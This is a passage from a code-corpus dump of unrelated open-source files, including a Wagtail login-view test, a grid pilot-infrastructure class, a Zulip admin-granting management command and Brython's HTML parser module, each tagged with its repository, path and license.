    '%d. %m. %Y. %H:%M',        # '25. 10. 2006. 14:30'
    '%d. %m. %Y.',              # '25. 10. 2006.'
    '%d. %m. %y. %H:%M:%S',     # '25. 10. 06. 14:30:59'
    '%d. %m. %y. %H:%M:%S.%f',  # '25. 10. 06. 14:30:59.000200'
    '%d. %m. %y. %H:%M',        # '25. 10. 06. 14:30'
    '%d. %m. %y.',              # '25. 10. 06.'
]
# Numbers are written as e.g. '1.234,56' in this locale.
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '.'
NUMBER_GROUPING = 3
| bsd-3-clause |
srsman/odoo | addons/stock_landed_costs/__init__.py | 373 | 1087 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import product
import stock_landed_costs
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
rguillebert/CythonCTypesBackend | tests/run/methodmangling_T5.py | 30 | 1847 | # mode: run
# ticket: 5
class CyTest(object):
    """
    >>> cy = CyTest()
    >>> '_CyTest__private' in dir(cy)
    True
    >>> cy._CyTest__private()
    8
    >>> '__private' in dir(cy)
    False
    >>> '_CyTest__x' in dir(cy)
    True
    >>> '__x' in dir(cy)
    False
    """
    # __x and __private are name-mangled to _CyTest__x / _CyTest__private.
    # The doctest docstrings above/below ARE the test and must not change.
    __x = 1
    def __private(self): return 8
    def get(self):
        """
        >>> CyTest().get()
        (1, 1, 8)
        """
        return self._CyTest__x, self.__x, self.__private()
    def get_inner(self):
        """
        >>> CyTest().get_inner()
        (1, 1, 8)
        """
        # Mangling is applied per the lexically enclosing class, even inside
        # a nested function.
        def get(o):
            return o._CyTest__x, o.__x, o.__private()
        return get(self)
class CyTestSub(CyTest):
    """
    >>> cy = CyTestSub()
    >>> '_CyTestSub__private' in dir(cy)
    True
    >>> cy._CyTestSub__private()
    9
    >>> '_CyTest__private' in dir(cy)
    True
    >>> cy._CyTest__private()
    8
    >>> '__private' in dir(cy)
    False
    >>> '_CyTestSub__x' in dir(cy)
    False
    >>> '_CyTestSub__y' in dir(cy)
    True
    >>> '_CyTest__x' in dir(cy)
    True
    >>> '__x' in dir(cy)
    False
    """
    # In a subclass, __names mangle with the subclass name, so the base's
    # _CyTest__private and this _CyTestSub__private coexist.
    __y = 2
    def __private(self): return 9
    def get(self):
        """
        >>> CyTestSub().get()
        (1, 2, 2, 9)
        """
        return self._CyTest__x, self._CyTestSub__y, self.__y, self.__private()
    def get_inner(self):
        """
        >>> CyTestSub().get_inner()
        (1, 2, 2, 9)
        """
        def get(o):
            return o._CyTest__x, o._CyTestSub__y, o.__y, o.__private()
        return get(self)
class _UnderscoreTest(object):
    """
    >>> ut = _UnderscoreTest()
    >>> '__x' in dir(ut)
    False
    >>> '_UnderscoreTest__x' in dir(ut)
    True
    >>> ut._UnderscoreTest__x
    1
    >>> ut.get()
    1
    """
    # Leading underscores in the class name are kept in the mangled name.
    __x = 1
    def get(self):
        return self.__x
| apache-2.0 |
torchbox/wagtail | wagtail/core/tests/test_views.py | 24 | 1449 | from django.test import TestCase
from django.urls import reverse
from wagtail.core.models import Page
from wagtail.tests.utils import WagtailTestUtils
class TestLoginView(TestCase, WagtailTestUtils):
    # Exercises the 'wagtailcore_login' view: form rendering, rejection of a
    # bad password, and redirect to 'next' on success.
    fixtures = ['test.json']
    def setUp(self):
        # A user created by WagtailTestUtils; the fixture provides the page.
        self.user = self.create_test_user()
        self.events_index = Page.objects.get(url_path='/home/events/')
    def test_get(self):
        # GET renders the login form without any error message.
        response = self.client.get(reverse('wagtailcore_login'))
        self.assertEqual(response.status_code, 200)
        self.assertContains(response, "<h1>Log in</h1>")
        self.assertNotContains(response, "<p>Your username and password didn't match. Please try again.</p>")
    def test_post_incorrect_password(self):
        # A wrong password re-renders the form with the mismatch message.
        response = self.client.post(reverse('wagtailcore_login'), {
            'username': 'test@email.com',
            'password': 'wrongpassword',
            'next': self.events_index.url,
        })
        self.assertEqual(response.status_code, 200)
        self.assertContains(response, "<h1>Log in</h1>")
        self.assertContains(response, "<p>Your username and password didn't match. Please try again.</p>")
    def test_post_correct_password(self):
        # Valid credentials redirect to the 'next' parameter.
        response = self.client.post(reverse('wagtailcore_login'), {
            'username': 'test@email.com',
            'password': 'password',
            'next': self.events_index.url,
        })
        self.assertRedirects(response, self.events_index.url)
| bsd-3-clause |
supermanue/montera | NewPilotInfrastructure.py | 1 | 11232 | '''
Created on Aug 24, 2012
@author: u5682
'''
from GridTask import GridTask
from Host import Host
from FakeHost import FakeHost
from Pilot import Pilot
import ExecutionManager
from Infrastructure import Infrastructure
from PilotResource import PilotResource
from InformationManager import obtainGWResources
import subprocess as sub
import xml.dom.minidom
from xml.dom.minidom import Node
import os, sys, time
from datetime import datetime, timedelta
from DRMAA import *
import InformationManager
from datetime import datetime
from base import Session
import base
from sqlalchemy import func
class NewPilotInfrastructure(Infrastructure):
'''
classdocs
'''
def __init__(self, *args, **kwargs):
super(NewPilotInfrastructure, self).__init__()
print ("Initializingi newPilot infrastructure. 0 pilots loaded")
self.pilots = []
    #HOST: running pilots that can execute jobs; they are named pilot_X
    #SITE: remote site where the pilots themselves are executed
    #Resource: either a pilot or a site.
def getHost(self, hostname):
foundHost = None
for host in self.hosts:
if host.hostname.strip().lower() == hostname:
return host
for pilot in self.pilots:
if pilot.hostname.strip().lower() == hostname:
return pilot
return None
    #FIRST UPDATE THE STATUS OF THE PILOTS, THEN THE STATUS OF THE HOSTS
    def updateStatus (self, gridTasks):
        """
        Refresh self.pilots from the current GridWay resource listing,
        keeping only previously-known pilots still published with at least
        one free slot.  C{gridTasks} is accepted for interface
        compatibility but not used here.
        """
        print ("UPDATE STATUS")
        GWHosts = obtainGWResources()
        if GWHosts ==[]:
            print("Error when parsing host information file, employing information from past executions")
            return GWHosts
        #PILOTS
        pastPilots = Session.query(Pilot).all()
        presentPilots = []
        #load XML to memory and extract data from hosts
        for resource in GWHosts:
            hostname = resource.getElementsByTagName("HOSTNAME")[0].firstChild.data.strip().lower() #TODO: remove "unicode" from TEXT
            try:
                foundLrms = resource.getElementsByTagName("LRMS_NAME")[0].firstChild.data.strip().lower()
            except:
                print ("Could not obtain resource LRMS, skipping it")
                continue
            if foundLrms != "jobmanager-pilot":
                continue
            #from here on every remaining resource is a pilot
            try:
                freeNodeCount = int(resource.getElementsByTagName("FREENODECOUNT")[0].firstChild.data)
            except:
                freeNodeCount = 0
            if not freeNodeCount > 0:
                continue;
            # Keep only pilots we already knew about that are still alive.
            for pilot in pastPilots:
                if pilot.hostname == hostname:
                    presentPilots.append(pilot)
                    break
        #the pilots that we will first employ are the resulting ones
        self.pilots = presentPilots
    #returns a list of the hosts that we know are working
    #HERE ONLY PILOTS ARE RETURNED
def getGoodHosts(self):
goddHosts=[]
for pilot in self.pilots:
if pilot.getWhetstones() > 0:
goddHosts.append(pilot)
return goddHosts
    def load(self):
        """
        Populate self.hosts and self.pilots from the database plus the
        current GridWay resource listing.  All pilots stored in the
        database are deleted and replaced by the ones currently published;
        on a parse error, fall back to the stored hosts and no pilots.
        """
        print ("LOAD - pilotInfrastructures")
        #SITES
        pastHosts = Session.query(Host).filter(Host.type=="hosts").all()
        presentHosts = []
        #PILOTS
        pastPilots = Session.query(Pilot).all()
        print ("Deleting all past pilots from database")
        for pilot in pastPilots:
            base.Session.delete(pilot)
        presentPilots = []
        GWHosts = obtainGWResources()
        print ("Updating information")
        #load XML to memory and extract data from hosts
        try:
            for resource in GWHosts:
                hostname = resource.getElementsByTagName("HOSTNAME")[0].firstChild.data.strip().lower() #TODO: remove "unicode" from TEXT
                try:
                    foundLrms = resource.getElementsByTagName("LRMS_NAME")[0].firstChild.data
                except:
                    print ("Could not obtain resource LRMS for site " + hostname + ", skipping it")
                    continue
                if foundLrms == "jobmanager-pilot":
                    #pilot name: read where the pilot actually runs
                    genericArgs = resource.getElementsByTagName("GENERIC_VAR_STR")
                    for node in genericArgs:
                        if node.attributes['NAME'].value =="PILOT_REAL_HOSTNAME":
                            workerNode = node.attributes['VALUE'].value.strip().lower()
                        if node.attributes['NAME'].value =="PILOT_REAL_RESOURCE":
                            site = node.attributes['VALUE'].value.strip().lower()
                    #number of free nodes: for pilots this works reliably and
                    #is what tells us whether the pilot is active or stopped
                    try:
                        freeNodeCount = int(resource.getElementsByTagName("FREENODECOUNT")[0].firstChild.data)
                    except:
                        freeNodeCount = 0
                    if not freeNodeCount > 0:
                        continue;
                    #store the pilot in the database:
                    #first look up its PilotResource, creating it if missing,
                    #then create the pilot that employs that resource
                    pilotResource = base.Session.query(PilotResource).filter(PilotResource.site == site, PilotResource.workerNode == workerNode).first()
                    if pilotResource == None:
                        pilotResource = PilotResource(site, workerNode)
                    pilot = Pilot(hostname, pilotResource=pilotResource)
                    presentPilots.append(pilot)
                else: #it is a site
                    for host in pastHosts:
                        if host.hostname == hostname:
                            presentHosts.append(host)
                            break
        except:
            print("Error when parsing host information file, employing information from past executions")
            self.hosts = pastHosts
            self.pilots = []
            return
        #the hosts that we will first employ are the resulting ones
        self.pilots = presentPilots
        self.hosts = presentHosts
    def showHosts(self):
        """Print the currently known hosts and pilots (with benchmarks)."""
        print ("...........")
        print ("Showing host list")
        total = len(self.hosts)
        print ("Total number of Hosts: " + str(total))
        print ("")
        print ("Hosts: ")
        for site in self.hosts:
            print (site.hostname)
        print ("")
        print ("Pilots: ")
        for pilot in self.pilots:
            print (pilot.hostname + ", " + str(pilot.getWhetstones()) + " whet")
        print ("---")
    #TODO: this name is poor and does not reflect what the method does; rename it
    def createInfrastructureTasks(self, infrastructureTasks):
        """
        Walk the GridWay resource listing, registering any new hosts or
        pilots (and updating published whetstone values), then return the
        profiling tasks to submit: profiling tasks for unknown hosts plus
        'fake' profiling tasks used to keep starting new pilots.
        """
        print ("-------------------")
        print ("-------------------")
        print ("createInfrastructureTasks- NewPilotInfrastructure")
#        self.showHosts()
        hostList = obtainGWResources()
        hostsToProfile = []
        print ("Analyzing resources ")
        for hostInfo in hostList:
            hostName = hostInfo.getElementsByTagName("HOSTNAME")[0].firstChild.data.strip().lower() #TODO: remove "unicode" from TEXT
            whetstones=0
            try:
                foundArch = hostInfo.getElementsByTagName("ARCH")[0].firstChild.data
            except:
                foundArch=""
            try:
                foundCpuMHz = int(hostInfo.getElementsByTagName("CPU_MHZ")[0].firstChild.data)
            except:
                foundCpuMHz = 0
            try:
                foundLrms = hostInfo.getElementsByTagName("LRMS_NAME")[0].firstChild.data.strip().lower()
            except:
                foundLrms = None
                print ("Could not find LRMS for host " + hostName + ", skipping it")
                continue
            try:
                freeNodeCount = int(hostInfo.getElementsByTagName("FREENODECOUNT")[0].firstChild.data)
            except:
                freeNodeCount = 0
            if foundLrms == "jobmanager-pilot":
                #only take into account pilots with at least one free slot
                if not freeNodeCount > 0:
                    continue
                username = os.getenv("USER")
                generic_stringArgs = hostInfo.getElementsByTagName("GENERIC_VAR_STR")
                for node in generic_stringArgs:
                    if node.attributes['NAME'].value =="PILOT_REAL_HOSTNAME":
                        workerNode = node.attributes['VALUE'].value.strip().lower()
                    if node.attributes['NAME'].value =="PILOT_REAL_RESOURCE":
                        site = node.attributes['VALUE'].value.strip().lower()
                genericIntArgs = hostInfo.getElementsByTagName("GENERIC_VAR_INT")
                for node in genericIntArgs:
                    if node.attributes['NAME'].value =="PILOT_" + username + "_VAR_5":
                        whetstones = int(node.attributes['VALUE'].value.strip().lower())
                        if whetstones > 65534:
                            whetstones = 0
#            whetstones = 0
            #if host is unknown, create a profiling task
            currentHost = self.getHost(hostName)
            if currentHost == None:
                print ("Host/Pilot not found. hostname: " + hostName + ", LRMS: " + foundLrms)
                if foundLrms == "jobmanager-pilot":
                    #a pilot has been found:
                    #first look for its resource, creating it if it does not exist,
                    #then create a pilot that uses that resource
                    pilotResource = base.Session.query(PilotResource).filter(PilotResource.site == site, PilotResource.workerNode == workerNode).first()
                    if pilotResource == None:
                        print ("   PilotResource was not found, creating a new one")
                        pilotResource = PilotResource(site, workerNode)
                    print ("   Creating a new Pilot in NewPilotInfrastructure.createInfrastructureTasks")
                    newHost = Pilot(hostName, arch=foundArch, cpuMHz = foundCpuMHz, pilotResource = pilotResource, whetstones = whetstones)
                    self.pilots.append(newHost)
                    Session.add(newHost)
                else:
                    print ("   Creating a new Host in NewPilotInfrastructure.createInfrastructureTasks")
                    newHost = Host(hostName, arch=foundArch, cpuMHz = foundCpuMHz, lrms=foundLrms)
                    self.hosts.append(newHost)
                    Session.add(newHost)
                #THIS WOULD PROFILE THE PILOTS IF THEY HAD NOT PUBLISHED THEIR
                #WHETSTONES; OTHERWISE IT IS NOT NEEDED
                #===============================================================
                # if whetstones == 0 or whetstones > 65534:
                #    whetstones = 0
                #    print ("   Host to profile: " + hostName + ": whetstone value not initialized ")
                #    hostsToProfile.append(newHost)
                #    #store new host on databae (faiulre resistance
                #    Session.add(newHost)
                #===============================================================
            #if information has changed, update host information
            elif (currentHost.getWhetstones() != whetstones):
                #done through a setter because it is a more involved
                #operation, so it is encapsulated in that function
                currentHost.setWhetstones(whetstones)
                Session.add(currentHost)
                print ("Host: " + hostName + " UPDATED, new whetstones=" + str(whetstones))
            elif currentHost.lrms == None:
                currentHost.lrms = foundLrms
        #profiling of new sites
        hostProfilingTasks = [ExecutionManager.createHostProfilingTask(host)
                              for host in hostsToProfile
                              for i in range(base.profilingTasksPerHost)]
        #we assume every pilot publishes the variable with its performance,
        #so nothing needs to be profiled.
        #NOW, IN THIS NEW APPROACH, WE WANT A FEW BENCHMARKS RUNNING IN ORDER
        #TO KEEP STARTING NEW PILOTS
        print ("creating fake profiling tasks")
        existingFakeTasks = len([task for task in infrastructureTasks if task.host.hostname=="" and task.status != "PENDING"])
        existingGoodPilots = len (self.getGoodHosts())
        existingProfilingTasks = len(hostProfilingTasks)
        #fakeTasksToCreate = base.maxRunningTasks - (existingFakeTasks + existingGoodPilots + existingProfilingTasks)
        fakeTasksToCreate = base.maxRunningTasks - existingFakeTasks
        print ("  Desired tasks: " + str(base.maxRunningTasks))
        print ("  Existing fake tasks: " + str(existingFakeTasks))
        print ("  Existing good pilots: " + str(existingGoodPilots))
        print ("  created: " + str(fakeTasksToCreate))
        emptyHost = FakeHost()
        fakeHostProfilingTasks = [ExecutionManager.createFakeHostProfilingTask(emptyHost)
                                  for i in range(fakeTasksToCreate)]
        hostProfilingTasks+=fakeHostProfilingTasks
        return hostProfilingTasks
| gpl-2.0 |
dattatreya303/zulip | zerver/management/commands/knight.py | 15 | 2864 | from __future__ import absolute_import
from __future__ import print_function
from typing import Any
from argparse import ArgumentParser
from django.core.management.base import BaseCommand, CommandError
from django.core.exceptions import ValidationError
from zerver.lib.actions import do_change_is_admin
from zerver.models import UserProfile
class Command(BaseCommand):
    help = """Give an existing user administrative permissions over their (own) Realm.
ONLY perform this on customer request from an authorized person.
"""
    def add_arguments(self, parser):
        # type: (ArgumentParser) -> None
        # -f/--for-real is a safety switch: without it the command only
        # prints what it would do.
        parser.add_argument('-f', '--for-real',
                            dest='ack',
                            action="store_true",
                            default=False,
                            help='Acknowledgement that this is done according to policy.')
        parser.add_argument('--revoke',
                            dest='grant',
                            action="store_false",
                            default=True,
                            help='Remove an administrator\'s rights.')
        parser.add_argument('--permission',
                            dest='permission',
                            action="store",
                            default='administer',
                            help='Permission to grant/remove.')
        parser.add_argument('email', metavar='<email>', type=str,
                            help="email of user to knight")
    def handle(self, *args, **options):
        # type: (*Any, **Any) -> None
        email = options['email']
        try:
            profile = UserProfile.objects.get(email=email)
        except ValidationError:
            # NOTE(review): QuerySet.get raises UserProfile.DoesNotExist for
            # a missing user, not ValidationError — confirm this clause ever
            # fires for the "no such user" case.
            raise CommandError("No such user.")
        if options['grant']:
            if profile.has_perm(options['permission'], profile.realm):
                raise CommandError("User already has permission for this realm.")
            else:
                if options['ack']:
                    do_change_is_admin(profile, True, permission=options['permission'])
                    print("Done!")
                else:
                    # Dry run: no --for-real flag given.
                    print("Would have granted %s %s rights for %s" % (
                        email, options['permission'], profile.realm.string_id))
        else:
            if profile.has_perm(options['permission'], profile.realm):
                if options['ack']:
                    do_change_is_admin(profile, False, permission=options['permission'])
                    print("Done!")
                else:
                    print("Would have removed %s's %s rights on %s" % (email, options['permission'],
                                                                       profile.realm.string_id))
            else:
                raise CommandError("User did not have permission for this realm!")
| apache-2.0 |
40223231/2015cd_midterm2 | static/Brython3.1.1-20150328-091302/Lib/html/parser.py | 737 | 19605 | """A parser for HTML and XHTML."""
# This file is based on sgmllib.py, but the API is slightly different.
# XXX There should be a way to distinguish between PCDATA (parsed
# character data -- the normal case), RCDATA (replaceable character
# data -- only char and entity references and end tags are special)
# and CDATA (character data -- only end tags are special).
import _markupbase
import re
import warnings
# Regular expressions used for parsing
interesting_normal = re.compile('[&<]')
incomplete = re.compile('&[a-zA-Z#]')
entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]')
charref = re.compile('&#(?:[0-9]+|[xX][0-9a-fA-F]+)[^0-9a-fA-F]')
starttagopen = re.compile('<[a-zA-Z]')
piclose = re.compile('>')
commentclose = re.compile(r'--\s*>')
tagfind = re.compile('([a-zA-Z][-.a-zA-Z0-9:_]*)(?:\s|/(?!>))*')
# see http://www.w3.org/TR/html5/tokenization.html#tag-open-state
# and http://www.w3.org/TR/html5/tokenization.html#tag-name-state
tagfind_tolerant = re.compile('[a-zA-Z][^\t\n\r\f />\x00]*')
# Note:
# 1) the strict attrfind isn't really strict, but we can't make it
# correctly strict without breaking backward compatibility;
# 2) if you change attrfind remember to update locatestarttagend too;
# 3) if you change attrfind and/or locatestarttagend the parser will
# explode, so don't do it.
attrfind = re.compile(
r'\s*([a-zA-Z_][-.:a-zA-Z_0-9]*)(\s*=\s*'
r'(\'[^\']*\'|"[^"]*"|[^\s"\'=<>`]*))?')
attrfind_tolerant = re.compile(
r'((?<=[\'"\s/])[^\s/>][^\s/=>]*)(\s*=+\s*'
r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?(?:\s|/(?!>))*')
locatestarttagend = re.compile(r"""
<[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
(?:\s+ # whitespace before attribute name
(?:[a-zA-Z_][-.:a-zA-Z0-9_]* # attribute name
(?:\s*=\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|\"[^\"]*\" # LIT-enclosed value
|[^'\">\s]+ # bare value
)
)?
)
)*
\s* # trailing whitespace
""", re.VERBOSE)
locatestarttagend_tolerant = re.compile(r"""
<[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
(?:[\s/]* # optional whitespace before attribute name
(?:(?<=['"\s/])[^\s/>][^\s/=>]* # attribute name
(?:\s*=+\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|"[^"]*" # LIT-enclosed value
|(?!['"])[^>\s]* # bare value
)
(?:\s*,)* # possibly followed by a comma
)?(?:\s|/(?!>))*
)*
)?
\s* # trailing whitespace
""", re.VERBOSE)
endendtag = re.compile('>')
# the HTML 5 spec, section 8.1.2.2, doesn't allow spaces between
# </ and the tag name, so maybe this should be fixed
endtagfind = re.compile('</\s*([a-zA-Z][-.a-zA-Z0-9:_]*)\s*>')
class HTMLParseError(Exception):
    """Raised for all parse errors; carries an optional (line, column) position."""

    def __init__(self, msg, position=(None, None)):
        assert msg
        self.msg = msg
        # Unpack the (lineno, offset) pair; either element may be None.
        self.lineno, self.offset = position[0], position[1]

    def __str__(self):
        parts = [self.msg]
        if self.lineno is not None:
            parts.append(", at line %d" % self.lineno)
        if self.offset is not None:
            # Offsets are stored zero-based but reported one-based.
            parts.append(", column %d" % (self.offset + 1))
        return "".join(parts)
class HTMLParser(_markupbase.ParserBase):
    """Find tags and other markup and call handler functions.

    Usage:
        p = HTMLParser()
        p.feed(data)
        ...
        p.close()

    Start tags are handled by calling self.handle_starttag() or
    self.handle_startendtag(); end tags by self.handle_endtag().  The
    data between tags is passed from the parser to the derived class
    by calling self.handle_data() with the data as argument (the data
    may be split up in arbitrary chunks).  Entity references are
    passed by calling self.handle_entityref() with the entity
    reference as the argument.  Numeric character references are
    passed to self.handle_charref() with the string containing the
    reference as the argument.
    """

    CDATA_CONTENT_ELEMENTS = ("script", "style")

    def __init__(self, strict=False):
        """Initialize and reset this instance.

        If strict is set to False (the default) the parser will parse invalid
        markup, otherwise it will raise an error.  Note that the strict mode
        is deprecated.
        """
        if strict:
            warnings.warn("The strict mode is deprecated.",
                          DeprecationWarning, stacklevel=2)
        self.strict = strict
        self.reset()

    def reset(self):
        """Reset this instance.  Loses all unprocessed data."""
        self.rawdata = ''
        self.lasttag = '???'
        self.interesting = interesting_normal
        self.cdata_elem = None
        _markupbase.ParserBase.reset(self)

    def feed(self, data):
        r"""Feed data to the parser.

        Call this as often as you want, with as little or as much text
        as you want (may include '\n').
        """
        self.rawdata = self.rawdata + data
        self.goahead(0)

    def close(self):
        """Handle any buffered data."""
        self.goahead(1)

    def error(self, message):
        """Raise HTMLParseError at the current input position."""
        raise HTMLParseError(message, self.getpos())

    __starttag_text = None

    def get_starttag_text(self):
        """Return full source of start tag: '<...>'."""
        return self.__starttag_text

    def set_cdata_mode(self, elem):
        # Inside <script>/<style> only the matching end tag is "interesting".
        self.cdata_elem = elem.lower()
        self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)

    def clear_cdata_mode(self):
        self.interesting = interesting_normal
        self.cdata_elem = None

    # Internal -- handle data as far as reasonable.  May leave state
    # and data to be processed by a subsequent call.  If 'end' is
    # true, force handling all data as if followed by EOF marker.
    def goahead(self, end):
        rawdata = self.rawdata
        i = 0
        n = len(rawdata)
        while i < n:
            match = self.interesting.search(rawdata, i) # < or &
            if match:
                j = match.start()
            else:
                if self.cdata_elem:
                    break
                j = n
            if i < j: self.handle_data(rawdata[i:j])
            i = self.updatepos(i, j)
            if i == n: break
            startswith = rawdata.startswith
            if startswith('<', i):
                if starttagopen.match(rawdata, i): # < + letter
                    k = self.parse_starttag(i)
                elif startswith("</", i):
                    k = self.parse_endtag(i)
                elif startswith("<!--", i):
                    k = self.parse_comment(i)
                elif startswith("<?", i):
                    k = self.parse_pi(i)
                elif startswith("<!", i):
                    if self.strict:
                        k = self.parse_declaration(i)
                    else:
                        k = self.parse_html_declaration(i)
                elif (i + 1) < n:
                    self.handle_data("<")
                    k = i + 1
                else:
                    break
                if k < 0:
                    if not end:
                        break
                    if self.strict:
                        self.error("EOF in middle of construct")
                    k = rawdata.find('>', i + 1)
                    if k < 0:
                        k = rawdata.find('<', i + 1)
                        if k < 0:
                            k = i + 1
                    else:
                        k += 1
                    self.handle_data(rawdata[i:k])
                i = self.updatepos(i, k)
            elif startswith("&#", i):
                match = charref.match(rawdata, i)
                if match:
                    name = match.group()[2:-1]
                    self.handle_charref(name)
                    k = match.end()
                    if not startswith(';', k-1):
                        k = k - 1
                    i = self.updatepos(i, k)
                    continue
                else:
                    if ";" in rawdata[i:]:  # bail by consuming &#
                        # Bug fix: consume the two characters at the *current*
                        # position.  The old code sliced rawdata[0:2] and
                        # rewound the position to 2, re-emitting the start of
                        # the buffer whenever i != 0.
                        self.handle_data(rawdata[i:i+2])
                        i = self.updatepos(i, i+2)
                    break
            elif startswith('&', i):
                match = entityref.match(rawdata, i)
                if match:
                    name = match.group(1)
                    self.handle_entityref(name)
                    k = match.end()
                    if not startswith(';', k-1):
                        k = k - 1
                    i = self.updatepos(i, k)
                    continue
                match = incomplete.match(rawdata, i)
                if match:
                    # match.group() will contain at least 2 chars
                    if end and match.group() == rawdata[i:]:
                        if self.strict:
                            self.error("EOF in middle of entity or char ref")
                        else:
                            k = match.end()
                            if k <= i:
                                k = n
                            i = self.updatepos(i, i + 1)
                    # incomplete
                    break
                elif (i + 1) < n:
                    # not the end of the buffer, and can't be confused
                    # with some other construct
                    self.handle_data("&")
                    i = self.updatepos(i, i + 1)
                else:
                    break
            else:
                assert 0, "interesting.search() lied"
        # end while
        if end and i < n and not self.cdata_elem:
            self.handle_data(rawdata[i:n])
            i = self.updatepos(i, n)
        self.rawdata = rawdata[i:]

    # Internal -- parse html declarations, return length or -1 if not terminated
    # See w3.org/TR/html5/tokenization.html#markup-declaration-open-state
    # See also parse_declaration in _markupbase
    def parse_html_declaration(self, i):
        rawdata = self.rawdata
        assert rawdata[i:i+2] == '<!', ('unexpected call to '
                                        'parse_html_declaration()')
        if rawdata[i:i+4] == '<!--':
            # this case is actually already handled in goahead()
            return self.parse_comment(i)
        elif rawdata[i:i+3] == '<![':
            return self.parse_marked_section(i)
        elif rawdata[i:i+9].lower() == '<!doctype':
            # find the closing >
            gtpos = rawdata.find('>', i+9)
            if gtpos == -1:
                return -1
            self.handle_decl(rawdata[i+2:gtpos])
            return gtpos+1
        else:
            return self.parse_bogus_comment(i)

    # Internal -- parse bogus comment, return length or -1 if not terminated
    # see http://www.w3.org/TR/html5/tokenization.html#bogus-comment-state
    def parse_bogus_comment(self, i, report=1):
        rawdata = self.rawdata
        assert rawdata[i:i+2] in ('<!', '</'), ('unexpected call to '
                                                'parse_comment()')
        pos = rawdata.find('>', i+2)
        if pos == -1:
            return -1
        if report:
            self.handle_comment(rawdata[i+2:pos])
        return pos + 1

    # Internal -- parse processing instr, return end or -1 if not terminated
    def parse_pi(self, i):
        rawdata = self.rawdata
        assert rawdata[i:i+2] == '<?', 'unexpected call to parse_pi()'
        match = piclose.search(rawdata, i+2) # >
        if not match:
            return -1
        j = match.start()
        self.handle_pi(rawdata[i+2: j])
        j = match.end()
        return j

    # Internal -- handle starttag, return end or -1 if not terminated
    def parse_starttag(self, i):
        self.__starttag_text = None
        endpos = self.check_for_whole_start_tag(i)
        if endpos < 0:
            return endpos
        rawdata = self.rawdata
        self.__starttag_text = rawdata[i:endpos]
        # Now parse the data between i+1 and j into a tag and attrs
        attrs = []
        match = tagfind.match(rawdata, i+1)
        assert match, 'unexpected call to parse_starttag()'
        k = match.end()
        self.lasttag = tag = match.group(1).lower()
        while k < endpos:
            if self.strict:
                m = attrfind.match(rawdata, k)
            else:
                m = attrfind_tolerant.match(rawdata, k)
            if not m:
                break
            attrname, rest, attrvalue = m.group(1, 2, 3)
            if not rest:
                attrvalue = None
            elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
                 attrvalue[:1] == '"' == attrvalue[-1:]:
                attrvalue = attrvalue[1:-1]
            if attrvalue:
                attrvalue = self.unescape(attrvalue)
            attrs.append((attrname.lower(), attrvalue))
            k = m.end()
        end = rawdata[k:endpos].strip()
        if end not in (">", "/>"):
            lineno, offset = self.getpos()
            if "\n" in self.__starttag_text:
                lineno = lineno + self.__starttag_text.count("\n")
                offset = len(self.__starttag_text) \
                         - self.__starttag_text.rfind("\n")
            else:
                offset = offset + len(self.__starttag_text)
            if self.strict:
                self.error("junk characters in start tag: %r"
                           % (rawdata[k:endpos][:20],))
            self.handle_data(rawdata[i:endpos])
            return endpos
        if end.endswith('/>'):
            # XHTML-style empty tag: <span attr="value" />
            self.handle_startendtag(tag, attrs)
        else:
            self.handle_starttag(tag, attrs)
            if tag in self.CDATA_CONTENT_ELEMENTS:
                self.set_cdata_mode(tag)
        return endpos

    # Internal -- check to see if we have a complete starttag; return end
    # or -1 if incomplete.
    def check_for_whole_start_tag(self, i):
        rawdata = self.rawdata
        if self.strict:
            m = locatestarttagend.match(rawdata, i)
        else:
            m = locatestarttagend_tolerant.match(rawdata, i)
        if m:
            j = m.end()
            next = rawdata[j:j+1]
            if next == ">":
                return j + 1
            if next == "/":
                if rawdata.startswith("/>", j):
                    return j + 2
                if rawdata.startswith("/", j):
                    # buffer boundary
                    return -1
                # else bogus input
                if self.strict:
                    self.updatepos(i, j + 1)
                    self.error("malformed empty start tag")
                if j > i:
                    return j
                else:
                    return i + 1
            if next == "":
                # end of input
                return -1
            if next in ("abcdefghijklmnopqrstuvwxyz=/"
                        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
                # end of input in or before attribute value, or we have the
                # '/' from a '/>' ending
                return -1
            if self.strict:
                self.updatepos(i, j)
                self.error("malformed start tag")
            if j > i:
                return j
            else:
                return i + 1
        raise AssertionError("we should not get here!")

    # Internal -- parse endtag, return end or -1 if incomplete
    def parse_endtag(self, i):
        rawdata = self.rawdata
        assert rawdata[i:i+2] == "</", "unexpected call to parse_endtag"
        match = endendtag.search(rawdata, i+1) # >
        if not match:
            return -1
        gtpos = match.end()
        match = endtagfind.match(rawdata, i) # </ + tag + >
        if not match:
            if self.cdata_elem is not None:
                self.handle_data(rawdata[i:gtpos])
                return gtpos
            if self.strict:
                self.error("bad end tag: %r" % (rawdata[i:gtpos],))
            # find the name: w3.org/TR/html5/tokenization.html#tag-name-state
            namematch = tagfind_tolerant.match(rawdata, i+2)
            if not namematch:
                # w3.org/TR/html5/tokenization.html#end-tag-open-state
                if rawdata[i:i+3] == '</>':
                    return i+3
                else:
                    return self.parse_bogus_comment(i)
            tagname = namematch.group().lower()
            # consume and ignore other stuff between the name and the >
            # Note: this is not 100% correct, since we might have things like
            # </tag attr=">">, but looking for > after the name should cover
            # most of the cases and is much simpler
            gtpos = rawdata.find('>', namematch.end())
            self.handle_endtag(tagname)
            return gtpos+1
